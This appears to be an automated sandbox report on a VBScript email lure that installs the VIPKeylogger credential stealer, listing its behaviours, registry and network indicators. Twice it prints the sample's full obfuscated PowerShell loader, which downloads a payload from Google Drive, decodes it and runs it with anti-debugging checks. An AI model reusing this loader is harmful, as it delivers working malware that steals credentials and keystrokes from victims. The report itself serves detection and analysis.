Malware Analysis Report

2024-11-30 14:58

Sample ID 241030-g5gq6sybkn
Target Request For Quotation-RFQ097524_Pdf.vbs
SHA256 14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e
Tags
vipkeylogger collection discovery keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e

Threat Level: Known bad

The file Request For Quotation-RFQ097524_Pdf.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection discovery keylogger stealer

Vipkeylogger family

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 06:23

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:25

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

158s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Skravereapparat Brnecykels Chilotomy Allegorien #>;$rlingsankerets='Blissful';<#Revanchekamps Ledestjerne Dandyishly Momotidae Anraaber Rommens #>; function Indbankende($Udspejdes){If ($host.DebuggerEnabled) {$Nationalrettens++;}$Refusionsopgrelsen=$Notwithstanding+$Udspejdes.'Length'-$Nationalrettens; for ( $Skillessness=5;$Skillessness -lt $Refusionsopgrelsen;$Skillessness+=6){$vejle=$Skillessness;$spejlet+=$Udspejdes[$Skillessness];}$spejlet;}function Pyrogens($Woblernes){ . ($Brinkmanns) ($Woblernes);}$Konformistiske=Indbankende 'LicenM DevioCeleszPersoiAffejlAa sklB dgraCusto/ko,st ';$Unsimulated156=Indbankende 'PrdisTcr,nalOrgans vile1 Shin2Forha ';$Mirjas='prove[AtramNStjerET,eogTK pit. dstas ,emaePar orFavorvPaniciSibilCKo,ceeSsl.np ExtooSpgelISpiriNReforTSlaaemLedsaaUttheNJow eAKeerigTusseEMaaleRAp ca] cari:Ch li:SeacoSSubpaERhinoCSnkniUCitywRInforiRepo tWolfrYEpexep L,derSkrivoUn alTAnseeO,jeneCFlygtOSoloslHyper=Drama$ tomiuRegisn CacoSProtii ugtiMRecliUEmblel MoldaMaaletFravreRom.ndHange1Faggo5Sanch6Jej,n ';$Konformistiske+=Indbankende 'Solst5Inter.St ki0Triss arbl(S micWInd eiBrndenNonsudAfs ioSidemwImpsosInsna cho dNSta iTCogit retsl1Disbo0 Kon .medde0 Sama;Safir BasylWstiksiUdv sn Pl u6Nedsl4 ,rig;Outsi .roldxThirs6Utthe4Diopt; Insi canalrChu,mvEffer:Crino1 Suba3Mangl1Affyr. Laps0Viv.c)Jenbr PartsGUni reHagbacUnt ekDis eoSaltp/Idiot2Gobyp0Puppe1Kandi0Haang0Under1U rmn0Hverd1Melli Af nF rusvi nterbattleKb anfsaarso Und xOkseb/Svine1Afkld3Rep o1anthe.Kidne0 B ug ';$Platoniker=Indbankende ',apesuFor,osUniveESordiR Fa,t-partiaMasseGApterEFrivoNBourntCopro ';$Udbldningers=Indbankende ' Dm nhUrnegtTypogts rmopArrens Call:Dyrlg/ nage/Preced.ilkar .rtiiUndervOutcaeFarve.NeodagefteroPlumoo SkrdgIndkol New eNrlse.StentcBevidoWoodym uses/opdrauImmatcFable?Pyro.eMisvix An epTissuosuperrDysletMgald=VentrdPuirso Kirkw Impen SeselDeprioDipnear fledKamm & Ma aiAnteddacc u=Softw1Mater2HumboVP,rineKryds-prod.AFarengUlkenfSkalpT VulcuMa giCukr iK Unm n.eceniA lesh rude7Statsa phonWR.spolSamme3Tilt,9ge tez SommpJubelQValseuUdskaj SkamkLabyrCGardiw RecogBremsdBijobHTeosoT,rste ';$Rattus=Indbankende 'c,rks>.ajor ';$Brinkmanns=Indbankende ' aldiDoumaemalacX Cr o ';$Fient='Outrivalled';$Skandinavist='\Bortelimeneres.Uds';Pyrogens (Indbankende 'Rudim$DozerGRainwL MangO OverbP lgrA S lel Regn:RadiuAtrikom nterBFiraaITk,edTDaktyiTilbasClothE ChamRmorale latasUndet=Explo$R ughEBel jnBallovInact:Bil,oAing nPGrat P SqueDSuperATorskt,latiaStrab+Ftncm$ .oussBl,bmKNeapoASvensNTakr DTo.sii inimn Sa nAS illVUdkigi essls Dre.tFra.r ');Pyrogens (Indbankende 'Zooph$ SterGTo,meL GuimO Schib eurya I trLletha:dialesMal,rUL fttpNondee Un,artaktfLCent,ADul.iBHal lOFdse RIsen,iElectoPhysouKalliSPsyc.nUnderEMult sInte,sMesch=Givti$TithouSyndidNedblB TabiLInvalDFrednnMarkeIU ocaN.nputG Per,ERos,bRVes,csUdenr.remisSFunduPFo,reL umbi amueTKr dr( onog$FormoR DelmAF rhaT Lnovt,agaeuRouses mort)Pinne ');Pyrogens (Indbankende $Mirjas);$Udbldningers=$superlaboriousness[0];$Verifikationens=(Indbankende 'Subca$G utcgLikvilre,reOHerm BPlodda s dalBrob : ReveIInstamRaketmVoldgAUnrufricterCFengeEAfmilS.lissc.lectIRdhaab BevglResigEu pan5Ap lo=JoannNQui.zeUdtalW Assi-HalvnOLeksibPandejSa,dsE ampCL.erbT Semi antshSPhysiyChikiSCykelt,aataEBlithMFrids.PosttnKr gsE nkartJehul.TegniwlifeseRegulbCrumbC ontrLAfhugiIndrme Tredn F astekspe ');Pyrogens ($Verifikationens);Pyrogens (Indbankende 'Koord$UnderIKujonmKildemAp alaVarebrSlskicSrv,reSatirsForsoc RegiihjemlbabelilSuluderelak5Rkeen.GabbiH yrogeMa ara hjr dGenereBa,serVirgosSubco[Pulas$ g.leP SkiblIllusa VisutKio,koStukknReshoiIsagokAnmrkeF,rgarCirke]Lsgr =Perso$ Bi.tKHuedeo Pan n Accif UlydobasigrOv rbmSytteiSkyldsA otetBegrliHe edsVnnedkNonh.eSorns ');$Strops203=Indbankende 'Hje,l$ StraIThundmHospimUdarma DegnrBescucKiwifeBosats ProrcMisi iGennebUstillForepe Anse5Milke.ChummDProg.oMetapw PolenMorn lSubs.oCraziaR tradbirkeFSub riLeadllC nnieTuris(S let$ ssegURavkndO erpbMajorlHedondMam nnAsieniOve nnV nregTopi e Brolr JulesDups , Inte$ saetP Forlo AngisEx,rot Odyst DommhN taly iplorTillgo B,vaiMelled IndraNo dvl Nd r)Misun ';$Postthyroidal=$Ambitiseres;Pyrogens (Indbankende 'Salie$ Sejugbarrel Ded.oGastrbGroanaParallSu or: SuboN UranoHresin CycyrL arne WeekQMi jsu vvei UnliS L rsIContetnitraeMi er=Seleu(SolostFjerneBlokastoksiT tire- Un hpHysteASkabsTInputh .hau eve$Dorsop Tilso epi SDis,eT nosttC argHStyrey InteRForbroRetsfiArabiDFabelaUn,raLsubtr)Hebra ');while (!$Nonrequisite) {Pyrogens (Indbankende 'Clina$ Kiasg tte lNavigoIn,flbUnlenamoililSpoli:CentiO angivDrifteSa iarBet.ehBirodoTanetl LnkoiIrishnKonfueE carstas es Aebl=Hybel$ UntrtLavherGreveu Dawne.orts ') ;Pyrogens $Strops203;Pyrogens (Indbankende 'Arti,SForflTDisaraproc,r artTFilov-SrskrSIl egl T amEStaldep iorPCl.rk Kajsp4Imeri ');Pyrogens (Indbankende ' Spri$OutwogWildiL Gok O undeBForskaWith.LDomme:Rr ddnF jlpoSuperndo ber PolyeC.mmeqSkambUViseliH.lvoSGermaIrift TStadfeCingu=Slger(Hyt eTTelegEPeppes Ton Tforly-IndbjPBlidea .fsktGinenh Unex Aris$FirempSugamOC,nomsProgrTBir.et Unu hSol,iY TerrRBas loRutsjI Apo,DFissuaA aziL,lama)Ne li ') ;Pyrogens (Indbankende 'Couri$AarenG Ons Lfolkeo.essubAf.edaDelegLci,il:LiterlTr.ppE JagtT fkbeT valie beklsGrucctOblivEUk,ukS Slag=Unint$Psyc,GRaadgL.ktexOKishkb B ggaWaferL Bush:Kde,eiBankbDSkamfEBarneNOutcatAdelsIDuvniTMarkeeAf krT S syS KaffPR gklrEggheONonbeb UndelPeploeacce,mNebraEUnd rTPrestspret +Bispo+Po zo%Filmm$ArtikSFacituStn ePRisenEBerthr SeleLLap laGittiBSu,ero SyssrOoi.si .ateo MellU N nvS.rednNPrefaE Impasari,rS Rund.AffircunlinOBu kiuRentenVugn TRamli ') ;$Udbldningers=$superlaboriousness[$Lettestes];}$Omdigtning=318395;$Uforsrgedes=31683;Pyrogens (Indbankende 'Baby $ Afk GIndkol R enOPrecoBSelvfA,hichlB,ond:VifilB.aninaClipsrFrsteYAposeS SnegP.verhhMaculeFidfaRRednie Ree mosg.=Dwa f EtatsGtelegEPockiTpough- DelmCTo.dioDefaiNvaabeTBl thES rygnSubarTLseng Tra,$DegenpVkkerOSkilbsTrillTPiecetVexatH kroby mertrFan,eO utatiHermeDC.sigaUdplulB.mhu ');Pyrogens (Indbankende ' Simp$Bahr gAttrilTrestoretrab c pyaSkattlS,inn:SprogD Bldhr UmbeaSube.nBorsyksrhfte EnerrTagryeRegio1Gul.y5Ford.3Slank Pa.as=Rejse Gril[TawdrSStandyUntersCompet Bre.eGl rem Biog.TabulCbilggoInforn udskvDreameDatabrAagettSider]P uci:Story:AutopFBouchrsalgboLudwim CincB Pr.caSlvbesFodere Flag6Overs4SneglSWooletKompirAfflaiNasarnRund.gVitup( Ldin$SlantBZarzuaFniker PaakyDrawbsEmblepr sunhOver eSeraerAmphieSpeku) arro ');Pyrogens (Indbankende ' fkli$.ammeGL getlWayako amibAfstdAKon rlPalai:.esepRly edOBereguP askg elfrhRosenI Fo tSU.smohSurde Smila= Paro nat.r[DrnedSKadenYTodd.Sexem TGoodleRecitM Met .alvorTRul eE arkeXAngartIndor. oldeELdrepnGraphCRepolO UdbeDKnoglISubclNDvrgfGfable]under: inni:Spid A ReseSDesilCG apaiIrratiNo de.,nkleg DentERentetS cias orstTtysaRMetasi Lgnen Platgdisem(Blods$Debi.DBlomsr NoncAUnbomNarbejKPasteesove RafmysEwullc1Physi5B.rne3Hornb)aceit ');Pyrogens (Indbankende 'Plati$detaigR zorlTil.oO,ugbrbNatalaMerliL.ensy:VaultFFarceLNunshE BreaTEj ndf Blo.E PrisL olshtNarageRhe mr Prob=.nter$ Fa irKvadroOuz,suLicenGS lliHDi saIFe dsSbeva hBel.j.ServiSMistnuMelleBAndens zaret V,olRSkallI Th nNHekseG Pi u(Inter$MadweOForstM StaddMedioIDinosGProceTImpernKjersIChuntnA lerg Hyal,Flde.$UmtteU B,kefOvertOVernar CensSSemitrWeepiGVerrieRm.blD S,ameFebe,SAbsol)Delfl ');Pyrogens $Fletfelter;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skravereapparat Brnecykels Chilotomy Allegorien #>;$rlingsankerets='Blissful';<#Revanchekamps Ledestjerne Dandyishly Momotidae Anraaber Rommens #>; function Indbankende($Udspejdes){If ($host.DebuggerEnabled) {$Nationalrettens++;}$Refusionsopgrelsen=$Notwithstanding+$Udspejdes.'Length'-$Nationalrettens; for ( $Skillessness=5;$Skillessness -lt $Refusionsopgrelsen;$Skillessness+=6){$vejle=$Skillessness;$spejlet+=$Udspejdes[$Skillessness];}$spejlet;}function Pyrogens($Woblernes){ . ($Brinkmanns) ($Woblernes);}$Konformistiske=Indbankende 'LicenM DevioCeleszPersoiAffejlAa sklB dgraCusto/ko,st ';$Unsimulated156=Indbankende 'PrdisTcr,nalOrgans vile1 Shin2Forha ';$Mirjas='prove[AtramNStjerET,eogTK pit. dstas ,emaePar orFavorvPaniciSibilCKo,ceeSsl.np ExtooSpgelISpiriNReforTSlaaemLedsaaUttheNJow eAKeerigTusseEMaaleRAp ca] cari:Ch li:SeacoSSubpaERhinoCSnkniUCitywRInforiRepo tWolfrYEpexep L,derSkrivoUn alTAnseeO,jeneCFlygtOSoloslHyper=Drama$ tomiuRegisn CacoSProtii ugtiMRecliUEmblel MoldaMaaletFravreRom.ndHange1Faggo5Sanch6Jej,n ';$Konformistiske+=Indbankende 'Solst5Inter.St ki0Triss arbl(S micWInd eiBrndenNonsudAfs ioSidemwImpsosInsna cho dNSta iTCogit retsl1Disbo0 Kon .medde0 Sama;Safir BasylWstiksiUdv sn Pl u6Nedsl4 ,rig;Outsi .roldxThirs6Utthe4Diopt; Insi canalrChu,mvEffer:Crino1 Suba3Mangl1Affyr. Laps0Viv.c)Jenbr PartsGUni reHagbacUnt ekDis eoSaltp/Idiot2Gobyp0Puppe1Kandi0Haang0Under1U rmn0Hverd1Melli Af nF rusvi nterbattleKb anfsaarso Und xOkseb/Svine1Afkld3Rep o1anthe.Kidne0 B ug ';$Platoniker=Indbankende ',apesuFor,osUniveESordiR Fa,t-partiaMasseGApterEFrivoNBourntCopro ';$Udbldningers=Indbankende ' Dm nhUrnegtTypogts rmopArrens Call:Dyrlg/ nage/Preced.ilkar .rtiiUndervOutcaeFarve.NeodagefteroPlumoo SkrdgIndkol New eNrlse.StentcBevidoWoodym uses/opdrauImmatcFable?Pyro.eMisvix An epTissuosuperrDysletMgald=VentrdPuirso Kirkw Impen SeselDeprioDipnear fledKamm & Ma aiAnteddacc u=Softw1Mater2HumboVP,rineKryds-prod.AFarengUlkenfSkalpT VulcuMa giCukr iK Unm n.eceniA lesh rude7Statsa phonWR.spolSamme3Tilt,9ge tez SommpJubelQValseuUdskaj SkamkLabyrCGardiw RecogBremsdBijobHTeosoT,rste ';$Rattus=Indbankende 'c,rks>.ajor ';$Brinkmanns=Indbankende ' aldiDoumaemalacX Cr o ';$Fient='Outrivalled';$Skandinavist='\Bortelimeneres.Uds';Pyrogens (Indbankende 'Rudim$DozerGRainwL MangO OverbP lgrA S lel Regn:RadiuAtrikom nterBFiraaITk,edTDaktyiTilbasClothE ChamRmorale latasUndet=Explo$R ughEBel jnBallovInact:Bil,oAing nPGrat P SqueDSuperATorskt,latiaStrab+Ftncm$ .oussBl,bmKNeapoASvensNTakr DTo.sii inimn Sa nAS illVUdkigi essls Dre.tFra.r ');Pyrogens (Indbankende 'Zooph$ SterGTo,meL GuimO Schib eurya I trLletha:dialesMal,rUL fttpNondee Un,artaktfLCent,ADul.iBHal lOFdse RIsen,iElectoPhysouKalliSPsyc.nUnderEMult sInte,sMesch=Givti$TithouSyndidNedblB TabiLInvalDFrednnMarkeIU ocaN.nputG Per,ERos,bRVes,csUdenr.remisSFunduPFo,reL umbi amueTKr dr( onog$FormoR DelmAF rhaT Lnovt,agaeuRouses mort)Pinne ');Pyrogens (Indbankende $Mirjas);$Udbldningers=$superlaboriousness[0];$Verifikationens=(Indbankende 'Subca$G utcgLikvilre,reOHerm BPlodda s dalBrob : ReveIInstamRaketmVoldgAUnrufricterCFengeEAfmilS.lissc.lectIRdhaab BevglResigEu pan5Ap lo=JoannNQui.zeUdtalW Assi-HalvnOLeksibPandejSa,dsE ampCL.erbT Semi antshSPhysiyChikiSCykelt,aataEBlithMFrids.PosttnKr gsE nkartJehul.TegniwlifeseRegulbCrumbC ontrLAfhugiIndrme Tredn F astekspe ');Pyrogens ($Verifikationens);Pyrogens (Indbankende 'Koord$UnderIKujonmKildemAp alaVarebrSlskicSrv,reSatirsForsoc RegiihjemlbabelilSuluderelak5Rkeen.GabbiH yrogeMa ara hjr dGenereBa,serVirgosSubco[Pulas$ g.leP SkiblIllusa VisutKio,koStukknReshoiIsagokAnmrkeF,rgarCirke]Lsgr =Perso$ Bi.tKHuedeo Pan n Accif UlydobasigrOv rbmSytteiSkyldsA otetBegrliHe edsVnnedkNonh.eSorns ');$Strops203=Indbankende 'Hje,l$ StraIThundmHospimUdarma DegnrBescucKiwifeBosats ProrcMisi iGennebUstillForepe Anse5Milke.ChummDProg.oMetapw PolenMorn lSubs.oCraziaR tradbirkeFSub riLeadllC nnieTuris(S let$ ssegURavkndO erpbMajorlHedondMam nnAsieniOve nnV nregTopi e Brolr JulesDups , Inte$ saetP Forlo AngisEx,rot Odyst DommhN taly iplorTillgo B,vaiMelled IndraNo dvl Nd r)Misun ';$Postthyroidal=$Ambitiseres;Pyrogens (Indbankende 'Salie$ Sejugbarrel Ded.oGastrbGroanaParallSu or: SuboN UranoHresin CycyrL arne WeekQMi jsu vvei UnliS L rsIContetnitraeMi er=Seleu(SolostFjerneBlokastoksiT tire- Un hpHysteASkabsTInputh .hau eve$Dorsop Tilso epi SDis,eT nosttC argHStyrey InteRForbroRetsfiArabiDFabelaUn,raLsubtr)Hebra ');while (!$Nonrequisite) {Pyrogens (Indbankende 'Clina$ Kiasg tte lNavigoIn,flbUnlenamoililSpoli:CentiO angivDrifteSa iarBet.ehBirodoTanetl LnkoiIrishnKonfueE carstas es Aebl=Hybel$ UntrtLavherGreveu Dawne.orts ') ;Pyrogens $Strops203;Pyrogens (Indbankende 'Arti,SForflTDisaraproc,r artTFilov-SrskrSIl egl T amEStaldep iorPCl.rk Kajsp4Imeri ');Pyrogens (Indbankende ' Spri$OutwogWildiL Gok O undeBForskaWith.LDomme:Rr ddnF jlpoSuperndo ber PolyeC.mmeqSkambUViseliH.lvoSGermaIrift TStadfeCingu=Slger(Hyt eTTelegEPeppes Ton Tforly-IndbjPBlidea .fsktGinenh Unex Aris$FirempSugamOC,nomsProgrTBir.et Unu hSol,iY TerrRBas loRutsjI Apo,DFissuaA aziL,lama)Ne li ') ;Pyrogens (Indbankende 'Couri$AarenG Ons Lfolkeo.essubAf.edaDelegLci,il:LiterlTr.ppE JagtT fkbeT valie beklsGrucctOblivEUk,ukS Slag=Unint$Psyc,GRaadgL.ktexOKishkb B ggaWaferL Bush:Kde,eiBankbDSkamfEBarneNOutcatAdelsIDuvniTMarkeeAf krT S syS KaffPR gklrEggheONonbeb UndelPeploeacce,mNebraEUnd rTPrestspret +Bispo+Po zo%Filmm$ArtikSFacituStn ePRisenEBerthr SeleLLap laGittiBSu,ero SyssrOoi.si .ateo MellU N nvS.rednNPrefaE Impasari,rS Rund.AffircunlinOBu kiuRentenVugn TRamli ') ;$Udbldningers=$superlaboriousness[$Lettestes];}$Omdigtning=318395;$Uforsrgedes=31683;Pyrogens (Indbankende 'Baby $ Afk GIndkol R enOPrecoBSelvfA,hichlB,ond:VifilB.aninaClipsrFrsteYAposeS SnegP.verhhMaculeFidfaRRednie Ree mosg.=Dwa f EtatsGtelegEPockiTpough- DelmCTo.dioDefaiNvaabeTBl thES rygnSubarTLseng Tra,$DegenpVkkerOSkilbsTrillTPiecetVexatH kroby mertrFan,eO utatiHermeDC.sigaUdplulB.mhu ');Pyrogens (Indbankende ' Simp$Bahr gAttrilTrestoretrab c pyaSkattlS,inn:SprogD Bldhr UmbeaSube.nBorsyksrhfte EnerrTagryeRegio1Gul.y5Ford.3Slank Pa.as=Rejse Gril[TawdrSStandyUntersCompet Bre.eGl rem Biog.TabulCbilggoInforn udskvDreameDatabrAagettSider]P uci:Story:AutopFBouchrsalgboLudwim CincB Pr.caSlvbesFodere Flag6Overs4SneglSWooletKompirAfflaiNasarnRund.gVitup( Ldin$SlantBZarzuaFniker PaakyDrawbsEmblepr sunhOver eSeraerAmphieSpeku) arro ');Pyrogens (Indbankende ' fkli$.ammeGL getlWayako amibAfstdAKon rlPalai:.esepRly edOBereguP askg elfrhRosenI Fo tSU.smohSurde Smila= Paro nat.r[DrnedSKadenYTodd.Sexem TGoodleRecitM Met .alvorTRul eE arkeXAngartIndor. oldeELdrepnGraphCRepolO UdbeDKnoglISubclNDvrgfGfable]under: inni:Spid A ReseSDesilCG apaiIrratiNo de.,nkleg DentERentetS cias orstTtysaRMetasi Lgnen Platgdisem(Blods$Debi.DBlomsr NoncAUnbomNarbejKPasteesove RafmysEwullc1Physi5B.rne3Hornb)aceit ');Pyrogens (Indbankende 'Plati$detaigR zorlTil.oO,ugbrbNatalaMerliL.ensy:VaultFFarceLNunshE BreaTEj ndf Blo.E PrisL olshtNarageRhe mr Prob=.nter$ Fa irKvadroOuz,suLicenGS lliHDi saIFe dsSbeva hBel.j.ServiSMistnuMelleBAndens zaret V,olRSkallI Th nNHekseG Pi u(Inter$MadweOForstM StaddMedioIDinosGProceTImpernKjersIChuntnA lerg Hyal,Flde.$UmtteU B,kefOvertOVernar CensSSemitrWeepiGVerrieRm.blD S,ameFebe,SAbsol)Delfl ');Pyrogens $Fletfelter;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.180.3:80 o.pki.goog tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 73.247.226.132.in-addr.arpa udp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

memory/2412-0-0x00007FFC0C5E3000-0x00007FFC0C5E5000-memory.dmp

memory/2412-10-0x000001E9327D0000-0x000001E9327F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5c13izr.0o4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2412-11-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp

memory/2412-12-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp

memory/2412-14-0x00007FFC0C5E3000-0x00007FFC0C5E5000-memory.dmp

memory/2412-15-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp

memory/2412-17-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp

memory/2412-18-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp

memory/2412-21-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp

memory/1840-22-0x0000000004D80000-0x0000000004DB6000-memory.dmp

memory/1840-23-0x00000000054A0000-0x0000000005AC8000-memory.dmp

memory/1840-24-0x0000000005470000-0x0000000005492000-memory.dmp

memory/1840-25-0x0000000005B50000-0x0000000005BB6000-memory.dmp

memory/1840-26-0x0000000005BC0000-0x0000000005C26000-memory.dmp

memory/1840-33-0x0000000005D00000-0x0000000006054000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d336b18e0e02e045650ac4f24c7ecaa7
SHA1 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA256 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512 e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

memory/1840-38-0x0000000006350000-0x000000000636E000-memory.dmp

memory/1840-39-0x00000000063E0000-0x000000000642C000-memory.dmp

memory/1840-40-0x00000000079F0000-0x000000000806A000-memory.dmp

memory/1840-41-0x00000000068D0000-0x00000000068EA000-memory.dmp

memory/1840-42-0x0000000007610000-0x00000000076A6000-memory.dmp

memory/1840-43-0x0000000007570000-0x0000000007592000-memory.dmp

memory/1840-44-0x0000000008620000-0x0000000008BC4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Bortelimeneres.Uds

